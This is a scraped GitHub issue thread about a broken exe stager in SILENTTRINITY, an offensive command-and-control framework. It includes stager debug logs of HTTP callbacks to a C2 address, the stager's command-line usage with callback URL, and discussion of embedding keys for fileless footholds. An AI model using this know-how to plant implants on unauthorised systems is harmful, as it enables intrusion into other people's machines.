[BUG] exe stager not working about silenttrinity HOT 9 CLOSED

@OscarAkaElvis I'm going to be digging into this in an hour or so after I murder some fools in Borderlands

from silenttrinity.

Quite weird... doing more tests sometimes i receive the stager but in a loop again and again and again very quickly.

from silenttrinity.

Below is the output from powershell stager from latest SILENTTRINITY git pull. I think the problem lies with stage.boo file:

Stage.boo(411,34): BCE0044: Block must be indented.
[] Attempting HTTP POST to https://192.168.1.164/e1cfb3da-9a72-4e72-84c7-25cb4bf53572
[-] Attempt #1
[] Attempting HTTP GET to https://192.168.1.164/e1cfb3da-9a72-4e72-84c7-25cb4bf53572
[-] Attempt #1
[*] Downloaded 569008 bytes

[*] Compiling Stage Code
[-] Error(s) compiling script, this probably means your Boo script has bugs

if you replace that file with the old one, you wont see this problem.

from silenttrinity.

Fixed, this was my bad. Was playing with stuff the other day with the stage.boo file and forgot to remove it from the commit.
Cheers

from silenttrinity.

Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?

from silenttrinity.

Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?

stager.exe <guid> <psk> <CallBack_URL>

from silenttrinity.

Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?

stager.exe <guid> <psk> <CallBack_URL>

Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager

from silenttrinity.

Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?

stager.exe <guid> <psk> <CallBack_URL>

Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager

I've added a 'getpsk' feature that allows you to do this inside the CLI in a pull that hasn't been accepted yet (here). The binary is mainly used for injection and I think the assumption is you'd be going for more of a 'fileless' attack for a foothold. However, I'm not 100% sure of why the psk isn't disclosed when 'generating' the exe stager. Thinking about it now, there should probably be an option to 'generate' a vanilla binary and one with the guid/psk/CB_urls embedded in it (so there is no need to supply command line arguments) along with the option to use an already generated guid/psk or a new pair.

BTW, currently nothing really happens when it's 'generated'. It's just a copy of what is in the /data folder.

from silenttrinity.

Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?

stager.exe <guid> <psk> <CallBack_URL>

Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager

I've added a 'getpsk' feature that allows you to do this inside the CLI in a pull that hasn't been accepted yet (here). The binary is mainly used for injection and I think the assumption is you'd be going for more of a 'fileless' attack for a foothold. However, I'm not 100% sure of why the psk isn't disclosed when 'generating' the exe stager. Thinking about it now, there should probably be an option to 'generate' a vanilla binary and one with the guid/psk/CB_urls embedded in it (so there is no need to supply command line arguments) along with the option to use an already generated guid/psk or a new pair.

BTW, currently nothing really happens when it's 'generated'. It's just a copy of what is in the /data folder.

Gotcha. I was in fact thinking of a binary where GUID/PSK/IP are already present. Thanks for clarifying.

from silenttrinity.